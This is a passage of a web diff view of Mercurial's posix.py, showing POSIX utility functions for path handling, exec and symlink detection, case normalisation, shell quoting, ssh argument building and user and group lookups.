##// END OF EJS Templates
rcutil: directly call win32.executablepath()...
Yuya Nishihara -
r37113:e24802ea default
parent child Browse files
Show More
@@ -1,697 +1,694 b''
1 # posix.py - Posix utility function implementations for Mercurial
1 # posix.py - Posix utility function implementations for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import fcntl
11 import fcntl
12 import getpass
12 import getpass
13 import grp
13 import grp
14 import os
14 import os
15 import pwd
15 import pwd
16 import re
16 import re
17 import select
17 import select
18 import stat
18 import stat
19 import sys
19 import sys
20 import tempfile
20 import tempfile
21 import unicodedata
21 import unicodedata
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 encoding,
25 encoding,
26 error,
26 error,
27 policy,
27 policy,
28 pycompat,
28 pycompat,
29 )
29 )
30
30
31 osutil = policy.importmod(r'osutil')
31 osutil = policy.importmod(r'osutil')
32
32
33 posixfile = open
33 posixfile = open
34 normpath = os.path.normpath
34 normpath = os.path.normpath
35 samestat = os.path.samestat
35 samestat = os.path.samestat
36 try:
36 try:
37 oslink = os.link
37 oslink = os.link
38 except AttributeError:
38 except AttributeError:
39 # Some platforms build Python without os.link on systems that are
39 # Some platforms build Python without os.link on systems that are
40 # vaguely unix-like but don't have hardlink support. For those
40 # vaguely unix-like but don't have hardlink support. For those
41 # poor souls, just say we tried and that it failed so we fall back
41 # poor souls, just say we tried and that it failed so we fall back
42 # to copies.
42 # to copies.
43 def oslink(src, dst):
43 def oslink(src, dst):
44 raise OSError(errno.EINVAL,
44 raise OSError(errno.EINVAL,
45 'hardlinks not supported: %s to %s' % (src, dst))
45 'hardlinks not supported: %s to %s' % (src, dst))
46 unlink = os.unlink
46 unlink = os.unlink
47 rename = os.rename
47 rename = os.rename
48 removedirs = os.removedirs
48 removedirs = os.removedirs
49 expandglobs = False
49 expandglobs = False
50
50
51 umask = os.umask(0)
51 umask = os.umask(0)
52 os.umask(umask)
52 os.umask(umask)
53
53
54 def split(p):
54 def split(p):
55 '''Same as posixpath.split, but faster
55 '''Same as posixpath.split, but faster
56
56
57 >>> import posixpath
57 >>> import posixpath
58 >>> for f in [b'/absolute/path/to/file',
58 >>> for f in [b'/absolute/path/to/file',
59 ... b'relative/path/to/file',
59 ... b'relative/path/to/file',
60 ... b'file_alone',
60 ... b'file_alone',
61 ... b'path/to/directory/',
61 ... b'path/to/directory/',
62 ... b'/multiple/path//separators',
62 ... b'/multiple/path//separators',
63 ... b'/file_at_root',
63 ... b'/file_at_root',
64 ... b'///multiple_leading_separators_at_root',
64 ... b'///multiple_leading_separators_at_root',
65 ... b'']:
65 ... b'']:
66 ... assert split(f) == posixpath.split(f), f
66 ... assert split(f) == posixpath.split(f), f
67 '''
67 '''
68 ht = p.rsplit('/', 1)
68 ht = p.rsplit('/', 1)
69 if len(ht) == 1:
69 if len(ht) == 1:
70 return '', p
70 return '', p
71 nh = ht[0].rstrip('/')
71 nh = ht[0].rstrip('/')
72 if nh:
72 if nh:
73 return nh, ht[1]
73 return nh, ht[1]
74 return ht[0] + '/', ht[1]
74 return ht[0] + '/', ht[1]
75
75
76 def openhardlinks():
76 def openhardlinks():
77 '''return true if it is safe to hold open file handles to hardlinks'''
77 '''return true if it is safe to hold open file handles to hardlinks'''
78 return True
78 return True
79
79
80 def nlinks(name):
80 def nlinks(name):
81 '''return number of hardlinks for the given file'''
81 '''return number of hardlinks for the given file'''
82 return os.lstat(name).st_nlink
82 return os.lstat(name).st_nlink
83
83
84 def parsepatchoutput(output_line):
84 def parsepatchoutput(output_line):
85 """parses the output produced by patch and returns the filename"""
85 """parses the output produced by patch and returns the filename"""
86 pf = output_line[14:]
86 pf = output_line[14:]
87 if pycompat.sysplatform == 'OpenVMS':
87 if pycompat.sysplatform == 'OpenVMS':
88 if pf[0] == '`':
88 if pf[0] == '`':
89 pf = pf[1:-1] # Remove the quotes
89 pf = pf[1:-1] # Remove the quotes
90 else:
90 else:
91 if pf.startswith("'") and pf.endswith("'") and " " in pf:
91 if pf.startswith("'") and pf.endswith("'") and " " in pf:
92 pf = pf[1:-1] # Remove the quotes
92 pf = pf[1:-1] # Remove the quotes
93 return pf
93 return pf
94
94
95 def sshargs(sshcmd, host, user, port):
95 def sshargs(sshcmd, host, user, port):
96 '''Build argument list for ssh'''
96 '''Build argument list for ssh'''
97 args = user and ("%s@%s" % (user, host)) or host
97 args = user and ("%s@%s" % (user, host)) or host
98 if '-' in args[:1]:
98 if '-' in args[:1]:
99 raise error.Abort(
99 raise error.Abort(
100 _('illegal ssh hostname or username starting with -: %s') % args)
100 _('illegal ssh hostname or username starting with -: %s') % args)
101 args = shellquote(args)
101 args = shellquote(args)
102 if port:
102 if port:
103 args = '-p %s %s' % (shellquote(port), args)
103 args = '-p %s %s' % (shellquote(port), args)
104 return args
104 return args
105
105
106 def isexec(f):
106 def isexec(f):
107 """check whether a file is executable"""
107 """check whether a file is executable"""
108 return (os.lstat(f).st_mode & 0o100 != 0)
108 return (os.lstat(f).st_mode & 0o100 != 0)
109
109
110 def setflags(f, l, x):
110 def setflags(f, l, x):
111 st = os.lstat(f)
111 st = os.lstat(f)
112 s = st.st_mode
112 s = st.st_mode
113 if l:
113 if l:
114 if not stat.S_ISLNK(s):
114 if not stat.S_ISLNK(s):
115 # switch file to link
115 # switch file to link
116 fp = open(f, 'rb')
116 fp = open(f, 'rb')
117 data = fp.read()
117 data = fp.read()
118 fp.close()
118 fp.close()
119 unlink(f)
119 unlink(f)
120 try:
120 try:
121 os.symlink(data, f)
121 os.symlink(data, f)
122 except OSError:
122 except OSError:
123 # failed to make a link, rewrite file
123 # failed to make a link, rewrite file
124 fp = open(f, "wb")
124 fp = open(f, "wb")
125 fp.write(data)
125 fp.write(data)
126 fp.close()
126 fp.close()
127 # no chmod needed at this point
127 # no chmod needed at this point
128 return
128 return
129 if stat.S_ISLNK(s):
129 if stat.S_ISLNK(s):
130 # switch link to file
130 # switch link to file
131 data = os.readlink(f)
131 data = os.readlink(f)
132 unlink(f)
132 unlink(f)
133 fp = open(f, "wb")
133 fp = open(f, "wb")
134 fp.write(data)
134 fp.write(data)
135 fp.close()
135 fp.close()
136 s = 0o666 & ~umask # avoid restatting for chmod
136 s = 0o666 & ~umask # avoid restatting for chmod
137
137
138 sx = s & 0o100
138 sx = s & 0o100
139 if st.st_nlink > 1 and bool(x) != bool(sx):
139 if st.st_nlink > 1 and bool(x) != bool(sx):
140 # the file is a hardlink, break it
140 # the file is a hardlink, break it
141 with open(f, "rb") as fp:
141 with open(f, "rb") as fp:
142 data = fp.read()
142 data = fp.read()
143 unlink(f)
143 unlink(f)
144 with open(f, "wb") as fp:
144 with open(f, "wb") as fp:
145 fp.write(data)
145 fp.write(data)
146
146
147 if x and not sx:
147 if x and not sx:
148 # Turn on +x for every +r bit when making a file executable
148 # Turn on +x for every +r bit when making a file executable
149 # and obey umask.
149 # and obey umask.
150 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
150 os.chmod(f, s | (s & 0o444) >> 2 & ~umask)
151 elif not x and sx:
151 elif not x and sx:
152 # Turn off all +x bits
152 # Turn off all +x bits
153 os.chmod(f, s & 0o666)
153 os.chmod(f, s & 0o666)
154
154
155 def copymode(src, dst, mode=None):
155 def copymode(src, dst, mode=None):
156 '''Copy the file mode from the file at path src to dst.
156 '''Copy the file mode from the file at path src to dst.
157 If src doesn't exist, we're using mode instead. If mode is None, we're
157 If src doesn't exist, we're using mode instead. If mode is None, we're
158 using umask.'''
158 using umask.'''
159 try:
159 try:
160 st_mode = os.lstat(src).st_mode & 0o777
160 st_mode = os.lstat(src).st_mode & 0o777
161 except OSError as inst:
161 except OSError as inst:
162 if inst.errno != errno.ENOENT:
162 if inst.errno != errno.ENOENT:
163 raise
163 raise
164 st_mode = mode
164 st_mode = mode
165 if st_mode is None:
165 if st_mode is None:
166 st_mode = ~umask
166 st_mode = ~umask
167 st_mode &= 0o666
167 st_mode &= 0o666
168 os.chmod(dst, st_mode)
168 os.chmod(dst, st_mode)
169
169
170 def checkexec(path):
170 def checkexec(path):
171 """
171 """
172 Check whether the given path is on a filesystem with UNIX-like exec flags
172 Check whether the given path is on a filesystem with UNIX-like exec flags
173
173
174 Requires a directory (like /foo/.hg)
174 Requires a directory (like /foo/.hg)
175 """
175 """
176
176
177 # VFAT on some Linux versions can flip mode but it doesn't persist
177 # VFAT on some Linux versions can flip mode but it doesn't persist
178 # a FS remount. Frequently we can detect it if files are created
178 # a FS remount. Frequently we can detect it if files are created
179 # with exec bit on.
179 # with exec bit on.
180
180
181 try:
181 try:
182 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
182 EXECFLAGS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
183 cachedir = os.path.join(path, '.hg', 'cache')
183 cachedir = os.path.join(path, '.hg', 'cache')
184 if os.path.isdir(cachedir):
184 if os.path.isdir(cachedir):
185 checkisexec = os.path.join(cachedir, 'checkisexec')
185 checkisexec = os.path.join(cachedir, 'checkisexec')
186 checknoexec = os.path.join(cachedir, 'checknoexec')
186 checknoexec = os.path.join(cachedir, 'checknoexec')
187
187
188 try:
188 try:
189 m = os.stat(checkisexec).st_mode
189 m = os.stat(checkisexec).st_mode
190 except OSError as e:
190 except OSError as e:
191 if e.errno != errno.ENOENT:
191 if e.errno != errno.ENOENT:
192 raise
192 raise
193 # checkisexec does not exist - fall through ...
193 # checkisexec does not exist - fall through ...
194 else:
194 else:
195 # checkisexec exists, check if it actually is exec
195 # checkisexec exists, check if it actually is exec
196 if m & EXECFLAGS != 0:
196 if m & EXECFLAGS != 0:
197 # ensure checkisexec exists, check it isn't exec
197 # ensure checkisexec exists, check it isn't exec
198 try:
198 try:
199 m = os.stat(checknoexec).st_mode
199 m = os.stat(checknoexec).st_mode
200 except OSError as e:
200 except OSError as e:
201 if e.errno != errno.ENOENT:
201 if e.errno != errno.ENOENT:
202 raise
202 raise
203 open(checknoexec, 'w').close() # might fail
203 open(checknoexec, 'w').close() # might fail
204 m = os.stat(checknoexec).st_mode
204 m = os.stat(checknoexec).st_mode
205 if m & EXECFLAGS == 0:
205 if m & EXECFLAGS == 0:
206 # check-exec is exec and check-no-exec is not exec
206 # check-exec is exec and check-no-exec is not exec
207 return True
207 return True
208 # checknoexec exists but is exec - delete it
208 # checknoexec exists but is exec - delete it
209 unlink(checknoexec)
209 unlink(checknoexec)
210 # checkisexec exists but is not exec - delete it
210 # checkisexec exists but is not exec - delete it
211 unlink(checkisexec)
211 unlink(checkisexec)
212
212
213 # check using one file, leave it as checkisexec
213 # check using one file, leave it as checkisexec
214 checkdir = cachedir
214 checkdir = cachedir
215 else:
215 else:
216 # check directly in path and don't leave checkisexec behind
216 # check directly in path and don't leave checkisexec behind
217 checkdir = path
217 checkdir = path
218 checkisexec = None
218 checkisexec = None
219 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
219 fh, fn = tempfile.mkstemp(dir=checkdir, prefix='hg-checkexec-')
220 try:
220 try:
221 os.close(fh)
221 os.close(fh)
222 m = os.stat(fn).st_mode
222 m = os.stat(fn).st_mode
223 if m & EXECFLAGS == 0:
223 if m & EXECFLAGS == 0:
224 os.chmod(fn, m & 0o777 | EXECFLAGS)
224 os.chmod(fn, m & 0o777 | EXECFLAGS)
225 if os.stat(fn).st_mode & EXECFLAGS != 0:
225 if os.stat(fn).st_mode & EXECFLAGS != 0:
226 if checkisexec is not None:
226 if checkisexec is not None:
227 os.rename(fn, checkisexec)
227 os.rename(fn, checkisexec)
228 fn = None
228 fn = None
229 return True
229 return True
230 finally:
230 finally:
231 if fn is not None:
231 if fn is not None:
232 unlink(fn)
232 unlink(fn)
233 except (IOError, OSError):
233 except (IOError, OSError):
234 # we don't care, the user probably won't be able to commit anyway
234 # we don't care, the user probably won't be able to commit anyway
235 return False
235 return False
236
236
237 def checklink(path):
237 def checklink(path):
238 """check whether the given path is on a symlink-capable filesystem"""
238 """check whether the given path is on a symlink-capable filesystem"""
239 # mktemp is not racy because symlink creation will fail if the
239 # mktemp is not racy because symlink creation will fail if the
240 # file already exists
240 # file already exists
241 while True:
241 while True:
242 cachedir = os.path.join(path, '.hg', 'cache')
242 cachedir = os.path.join(path, '.hg', 'cache')
243 checklink = os.path.join(cachedir, 'checklink')
243 checklink = os.path.join(cachedir, 'checklink')
244 # try fast path, read only
244 # try fast path, read only
245 if os.path.islink(checklink):
245 if os.path.islink(checklink):
246 return True
246 return True
247 if os.path.isdir(cachedir):
247 if os.path.isdir(cachedir):
248 checkdir = cachedir
248 checkdir = cachedir
249 else:
249 else:
250 checkdir = path
250 checkdir = path
251 cachedir = None
251 cachedir = None
252 fscheckdir = pycompat.fsdecode(checkdir)
252 fscheckdir = pycompat.fsdecode(checkdir)
253 name = tempfile.mktemp(dir=fscheckdir,
253 name = tempfile.mktemp(dir=fscheckdir,
254 prefix=r'checklink-')
254 prefix=r'checklink-')
255 name = pycompat.fsencode(name)
255 name = pycompat.fsencode(name)
256 try:
256 try:
257 fd = None
257 fd = None
258 if cachedir is None:
258 if cachedir is None:
259 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
259 fd = tempfile.NamedTemporaryFile(dir=fscheckdir,
260 prefix=r'hg-checklink-')
260 prefix=r'hg-checklink-')
261 target = pycompat.fsencode(os.path.basename(fd.name))
261 target = pycompat.fsencode(os.path.basename(fd.name))
262 else:
262 else:
263 # create a fixed file to link to; doesn't matter if it
263 # create a fixed file to link to; doesn't matter if it
264 # already exists.
264 # already exists.
265 target = 'checklink-target'
265 target = 'checklink-target'
266 try:
266 try:
267 fullpath = os.path.join(cachedir, target)
267 fullpath = os.path.join(cachedir, target)
268 open(fullpath, 'w').close()
268 open(fullpath, 'w').close()
269 except IOError as inst:
269 except IOError as inst:
270 if inst[0] == errno.EACCES:
270 if inst[0] == errno.EACCES:
271 # If we can't write to cachedir, just pretend
271 # If we can't write to cachedir, just pretend
272 # that the fs is readonly and by association
272 # that the fs is readonly and by association
273 # that the fs won't support symlinks. This
273 # that the fs won't support symlinks. This
274 # seems like the least dangerous way to avoid
274 # seems like the least dangerous way to avoid
275 # data loss.
275 # data loss.
276 return False
276 return False
277 raise
277 raise
278 try:
278 try:
279 os.symlink(target, name)
279 os.symlink(target, name)
280 if cachedir is None:
280 if cachedir is None:
281 unlink(name)
281 unlink(name)
282 else:
282 else:
283 try:
283 try:
284 os.rename(name, checklink)
284 os.rename(name, checklink)
285 except OSError:
285 except OSError:
286 unlink(name)
286 unlink(name)
287 return True
287 return True
288 except OSError as inst:
288 except OSError as inst:
289 # link creation might race, try again
289 # link creation might race, try again
290 if inst[0] == errno.EEXIST:
290 if inst[0] == errno.EEXIST:
291 continue
291 continue
292 raise
292 raise
293 finally:
293 finally:
294 if fd is not None:
294 if fd is not None:
295 fd.close()
295 fd.close()
296 except AttributeError:
296 except AttributeError:
297 return False
297 return False
298 except OSError as inst:
298 except OSError as inst:
299 # sshfs might report failure while successfully creating the link
299 # sshfs might report failure while successfully creating the link
300 if inst[0] == errno.EIO and os.path.exists(name):
300 if inst[0] == errno.EIO and os.path.exists(name):
301 unlink(name)
301 unlink(name)
302 return False
302 return False
303
303
304 def checkosfilename(path):
304 def checkosfilename(path):
305 '''Check that the base-relative path is a valid filename on this platform.
305 '''Check that the base-relative path is a valid filename on this platform.
306 Returns None if the path is ok, or a UI string describing the problem.'''
306 Returns None if the path is ok, or a UI string describing the problem.'''
307 return None # on posix platforms, every path is ok
307 return None # on posix platforms, every path is ok
308
308
309 def getfsmountpoint(dirpath):
309 def getfsmountpoint(dirpath):
310 '''Get the filesystem mount point from a directory (best-effort)
310 '''Get the filesystem mount point from a directory (best-effort)
311
311
312 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
312 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
313 '''
313 '''
314 return getattr(osutil, 'getfsmountpoint', lambda x: None)(dirpath)
314 return getattr(osutil, 'getfsmountpoint', lambda x: None)(dirpath)
315
315
316 def getfstype(dirpath):
316 def getfstype(dirpath):
317 '''Get the filesystem type name from a directory (best-effort)
317 '''Get the filesystem type name from a directory (best-effort)
318
318
319 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
319 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
320 '''
320 '''
321 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
321 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
322
322
323 def setbinary(fd):
323 def setbinary(fd):
324 pass
324 pass
325
325
326 def pconvert(path):
326 def pconvert(path):
327 return path
327 return path
328
328
329 def localpath(path):
329 def localpath(path):
330 return path
330 return path
331
331
332 def samefile(fpath1, fpath2):
332 def samefile(fpath1, fpath2):
333 """Returns whether path1 and path2 refer to the same file. This is only
333 """Returns whether path1 and path2 refer to the same file. This is only
334 guaranteed to work for files, not directories."""
334 guaranteed to work for files, not directories."""
335 return os.path.samefile(fpath1, fpath2)
335 return os.path.samefile(fpath1, fpath2)
336
336
337 def samedevice(fpath1, fpath2):
337 def samedevice(fpath1, fpath2):
338 """Returns whether fpath1 and fpath2 are on the same device. This is only
338 """Returns whether fpath1 and fpath2 are on the same device. This is only
339 guaranteed to work for files, not directories."""
339 guaranteed to work for files, not directories."""
340 st1 = os.lstat(fpath1)
340 st1 = os.lstat(fpath1)
341 st2 = os.lstat(fpath2)
341 st2 = os.lstat(fpath2)
342 return st1.st_dev == st2.st_dev
342 return st1.st_dev == st2.st_dev
343
343
344 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
344 # os.path.normcase is a no-op, which doesn't help us on non-native filesystems
345 def normcase(path):
345 def normcase(path):
346 return path.lower()
346 return path.lower()
347
347
348 # what normcase does to ASCII strings
348 # what normcase does to ASCII strings
349 normcasespec = encoding.normcasespecs.lower
349 normcasespec = encoding.normcasespecs.lower
350 # fallback normcase function for non-ASCII strings
350 # fallback normcase function for non-ASCII strings
351 normcasefallback = normcase
351 normcasefallback = normcase
352
352
353 if pycompat.isdarwin:
353 if pycompat.isdarwin:
354
354
355 def normcase(path):
355 def normcase(path):
356 '''
356 '''
357 Normalize a filename for OS X-compatible comparison:
357 Normalize a filename for OS X-compatible comparison:
358 - escape-encode invalid characters
358 - escape-encode invalid characters
359 - decompose to NFD
359 - decompose to NFD
360 - lowercase
360 - lowercase
361 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
361 - omit ignored characters [200c-200f, 202a-202e, 206a-206f,feff]
362
362
363 >>> normcase(b'UPPER')
363 >>> normcase(b'UPPER')
364 'upper'
364 'upper'
365 >>> normcase(b'Caf\\xc3\\xa9')
365 >>> normcase(b'Caf\\xc3\\xa9')
366 'cafe\\xcc\\x81'
366 'cafe\\xcc\\x81'
367 >>> normcase(b'\\xc3\\x89')
367 >>> normcase(b'\\xc3\\x89')
368 'e\\xcc\\x81'
368 'e\\xcc\\x81'
369 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
369 >>> normcase(b'\\xb8\\xca\\xc3\\xca\\xbe\\xc8.JPG') # issue3918
370 '%b8%ca%c3\\xca\\xbe%c8.jpg'
370 '%b8%ca%c3\\xca\\xbe%c8.jpg'
371 '''
371 '''
372
372
373 try:
373 try:
374 return encoding.asciilower(path) # exception for non-ASCII
374 return encoding.asciilower(path) # exception for non-ASCII
375 except UnicodeDecodeError:
375 except UnicodeDecodeError:
376 return normcasefallback(path)
376 return normcasefallback(path)
377
377
378 normcasespec = encoding.normcasespecs.lower
378 normcasespec = encoding.normcasespecs.lower
379
379
380 def normcasefallback(path):
380 def normcasefallback(path):
381 try:
381 try:
382 u = path.decode('utf-8')
382 u = path.decode('utf-8')
383 except UnicodeDecodeError:
383 except UnicodeDecodeError:
384 # OS X percent-encodes any bytes that aren't valid utf-8
384 # OS X percent-encodes any bytes that aren't valid utf-8
385 s = ''
385 s = ''
386 pos = 0
386 pos = 0
387 l = len(path)
387 l = len(path)
388 while pos < l:
388 while pos < l:
389 try:
389 try:
390 c = encoding.getutf8char(path, pos)
390 c = encoding.getutf8char(path, pos)
391 pos += len(c)
391 pos += len(c)
392 except ValueError:
392 except ValueError:
393 c = '%%%02X' % ord(path[pos:pos + 1])
393 c = '%%%02X' % ord(path[pos:pos + 1])
394 pos += 1
394 pos += 1
395 s += c
395 s += c
396
396
397 u = s.decode('utf-8')
397 u = s.decode('utf-8')
398
398
399 # Decompose then lowercase (HFS+ technote specifies lower)
399 # Decompose then lowercase (HFS+ technote specifies lower)
400 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
400 enc = unicodedata.normalize(r'NFD', u).lower().encode('utf-8')
401 # drop HFS+ ignored characters
401 # drop HFS+ ignored characters
402 return encoding.hfsignoreclean(enc)
402 return encoding.hfsignoreclean(enc)
403
403
404 if pycompat.sysplatform == 'cygwin':
404 if pycompat.sysplatform == 'cygwin':
405 # workaround for cygwin, in which mount point part of path is
405 # workaround for cygwin, in which mount point part of path is
406 # treated as case sensitive, even though underlying NTFS is case
406 # treated as case sensitive, even though underlying NTFS is case
407 # insensitive.
407 # insensitive.
408
408
409 # default mount points
409 # default mount points
410 cygwinmountpoints = sorted([
410 cygwinmountpoints = sorted([
411 "/usr/bin",
411 "/usr/bin",
412 "/usr/lib",
412 "/usr/lib",
413 "/cygdrive",
413 "/cygdrive",
414 ], reverse=True)
414 ], reverse=True)
415
415
416 # use upper-ing as normcase as same as NTFS workaround
416 # use upper-ing as normcase as same as NTFS workaround
417 def normcase(path):
417 def normcase(path):
418 pathlen = len(path)
418 pathlen = len(path)
419 if (pathlen == 0) or (path[0] != pycompat.ossep):
419 if (pathlen == 0) or (path[0] != pycompat.ossep):
420 # treat as relative
420 # treat as relative
421 return encoding.upper(path)
421 return encoding.upper(path)
422
422
423 # to preserve case of mountpoint part
423 # to preserve case of mountpoint part
424 for mp in cygwinmountpoints:
424 for mp in cygwinmountpoints:
425 if not path.startswith(mp):
425 if not path.startswith(mp):
426 continue
426 continue
427
427
428 mplen = len(mp)
428 mplen = len(mp)
429 if mplen == pathlen: # mount point itself
429 if mplen == pathlen: # mount point itself
430 return mp
430 return mp
431 if path[mplen] == pycompat.ossep:
431 if path[mplen] == pycompat.ossep:
432 return mp + encoding.upper(path[mplen:])
432 return mp + encoding.upper(path[mplen:])
433
433
434 return encoding.upper(path)
434 return encoding.upper(path)
435
435
436 normcasespec = encoding.normcasespecs.other
436 normcasespec = encoding.normcasespecs.other
437 normcasefallback = normcase
437 normcasefallback = normcase
438
438
439 # Cygwin translates native ACLs to POSIX permissions,
439 # Cygwin translates native ACLs to POSIX permissions,
440 # but these translations are not supported by native
440 # but these translations are not supported by native
441 # tools, so the exec bit tends to be set erroneously.
441 # tools, so the exec bit tends to be set erroneously.
442 # Therefore, disable executable bit access on Cygwin.
442 # Therefore, disable executable bit access on Cygwin.
443 def checkexec(path):
443 def checkexec(path):
444 return False
444 return False
445
445
446 # Similarly, Cygwin's symlink emulation is likely to create
446 # Similarly, Cygwin's symlink emulation is likely to create
447 # problems when Mercurial is used from both Cygwin and native
447 # problems when Mercurial is used from both Cygwin and native
448 # Windows, with other native tools, or on shared volumes
448 # Windows, with other native tools, or on shared volumes
449 def checklink(path):
449 def checklink(path):
450 return False
450 return False
451
451
452 _needsshellquote = None
452 _needsshellquote = None
453 def shellquote(s):
453 def shellquote(s):
454 if pycompat.sysplatform == 'OpenVMS':
454 if pycompat.sysplatform == 'OpenVMS':
455 return '"%s"' % s
455 return '"%s"' % s
456 global _needsshellquote
456 global _needsshellquote
457 if _needsshellquote is None:
457 if _needsshellquote is None:
458 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
458 _needsshellquote = re.compile(br'[^a-zA-Z0-9._/+-]').search
459 if s and not _needsshellquote(s):
459 if s and not _needsshellquote(s):
460 # "s" shouldn't have to be quoted
460 # "s" shouldn't have to be quoted
461 return s
461 return s
462 else:
462 else:
463 return "'%s'" % s.replace("'", "'\\''")
463 return "'%s'" % s.replace("'", "'\\''")
464
464
465 def shellsplit(s):
465 def shellsplit(s):
466 """Parse a command string in POSIX shell way (best-effort)"""
466 """Parse a command string in POSIX shell way (best-effort)"""
467 return pycompat.shlexsplit(s, posix=True)
467 return pycompat.shlexsplit(s, posix=True)
468
468
469 def quotecommand(cmd):
469 def quotecommand(cmd):
470 return cmd
470 return cmd
471
471
472 def popen(command, mode='r'):
472 def popen(command, mode='r'):
473 return os.popen(command, mode)
473 return os.popen(command, mode)
474
474
475 def testpid(pid):
475 def testpid(pid):
476 '''return False if pid dead, True if running or not sure'''
476 '''return False if pid dead, True if running or not sure'''
477 if pycompat.sysplatform == 'OpenVMS':
477 if pycompat.sysplatform == 'OpenVMS':
478 return True
478 return True
479 try:
479 try:
480 os.kill(pid, 0)
480 os.kill(pid, 0)
481 return True
481 return True
482 except OSError as inst:
482 except OSError as inst:
483 return inst.errno != errno.ESRCH
483 return inst.errno != errno.ESRCH
484
484
485 def explainexit(code):
485 def explainexit(code):
486 """return a 2-tuple (desc, code) describing a subprocess status
486 """return a 2-tuple (desc, code) describing a subprocess status
487 (codes from kill are negative - not os.system/wait encoding)"""
487 (codes from kill are negative - not os.system/wait encoding)"""
488 if code >= 0:
488 if code >= 0:
489 return _("exited with status %d") % code, code
489 return _("exited with status %d") % code, code
490 return _("killed by signal %d") % -code, -code
490 return _("killed by signal %d") % -code, -code
491
491
492 def isowner(st):
492 def isowner(st):
493 """Return True if the stat object st is from the current user."""
493 """Return True if the stat object st is from the current user."""
494 return st.st_uid == os.getuid()
494 return st.st_uid == os.getuid()
495
495
496 def findexe(command):
496 def findexe(command):
497 '''Find executable for command searching like which does.
497 '''Find executable for command searching like which does.
498 If command is a basename then PATH is searched for command.
498 If command is a basename then PATH is searched for command.
499 PATH isn't searched if command is an absolute or relative path.
499 PATH isn't searched if command is an absolute or relative path.
500 If command isn't found None is returned.'''
500 If command isn't found None is returned.'''
501 if pycompat.sysplatform == 'OpenVMS':
501 if pycompat.sysplatform == 'OpenVMS':
502 return command
502 return command
503
503
504 def findexisting(executable):
504 def findexisting(executable):
505 'Will return executable if existing file'
505 'Will return executable if existing file'
506 if os.path.isfile(executable) and os.access(executable, os.X_OK):
506 if os.path.isfile(executable) and os.access(executable, os.X_OK):
507 return executable
507 return executable
508 return None
508 return None
509
509
510 if pycompat.ossep in command:
510 if pycompat.ossep in command:
511 return findexisting(command)
511 return findexisting(command)
512
512
513 if pycompat.sysplatform == 'plan9':
513 if pycompat.sysplatform == 'plan9':
514 return findexisting(os.path.join('/bin', command))
514 return findexisting(os.path.join('/bin', command))
515
515
516 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
516 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
517 executable = findexisting(os.path.join(path, command))
517 executable = findexisting(os.path.join(path, command))
518 if executable is not None:
518 if executable is not None:
519 return executable
519 return executable
520 return None
520 return None
521
521
522 def setsignalhandler():
522 def setsignalhandler():
523 pass
523 pass
524
524
525 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
525 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
526
526
527 def statfiles(files):
527 def statfiles(files):
528 '''Stat each file in files. Yield each stat, or None if a file does not
528 '''Stat each file in files. Yield each stat, or None if a file does not
529 exist or has a type we don't care about.'''
529 exist or has a type we don't care about.'''
530 lstat = os.lstat
530 lstat = os.lstat
531 getkind = stat.S_IFMT
531 getkind = stat.S_IFMT
532 for nf in files:
532 for nf in files:
533 try:
533 try:
534 st = lstat(nf)
534 st = lstat(nf)
535 if getkind(st.st_mode) not in _wantedkinds:
535 if getkind(st.st_mode) not in _wantedkinds:
536 st = None
536 st = None
537 except OSError as err:
537 except OSError as err:
538 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
538 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
539 raise
539 raise
540 st = None
540 st = None
541 yield st
541 yield st
542
542
543 def getuser():
543 def getuser():
544 '''return name of current user'''
544 '''return name of current user'''
545 return pycompat.fsencode(getpass.getuser())
545 return pycompat.fsencode(getpass.getuser())
546
546
547 def username(uid=None):
547 def username(uid=None):
548 """Return the name of the user with the given uid.
548 """Return the name of the user with the given uid.
549
549
550 If uid is None, return the name of the current user."""
550 If uid is None, return the name of the current user."""
551
551
552 if uid is None:
552 if uid is None:
553 uid = os.getuid()
553 uid = os.getuid()
554 try:
554 try:
555 return pwd.getpwuid(uid)[0]
555 return pwd.getpwuid(uid)[0]
556 except KeyError:
556 except KeyError:
557 return str(uid)
557 return str(uid)
558
558
559 def groupname(gid=None):
559 def groupname(gid=None):
560 """Return the name of the group with the given gid.
560 """Return the name of the group with the given gid.
561
561
562 If gid is None, return the name of the current group."""
562 If gid is None, return the name of the current group."""
563
563
564 if gid is None:
564 if gid is None:
565 gid = os.getgid()
565 gid = os.getgid()
566 try:
566 try:
567 return grp.getgrgid(gid)[0]
567 return grp.getgrgid(gid)[0]
568 except KeyError:
568 except KeyError:
569 return str(gid)
569 return str(gid)
570
570
571 def groupmembers(name):
571 def groupmembers(name):
572 """Return the list of members of the group with the given
572 """Return the list of members of the group with the given
573 name, KeyError if the group does not exist.
573 name, KeyError if the group does not exist.
574 """
574 """
575 return list(grp.getgrnam(name).gr_mem)
575 return list(grp.getgrnam(name).gr_mem)
576
576
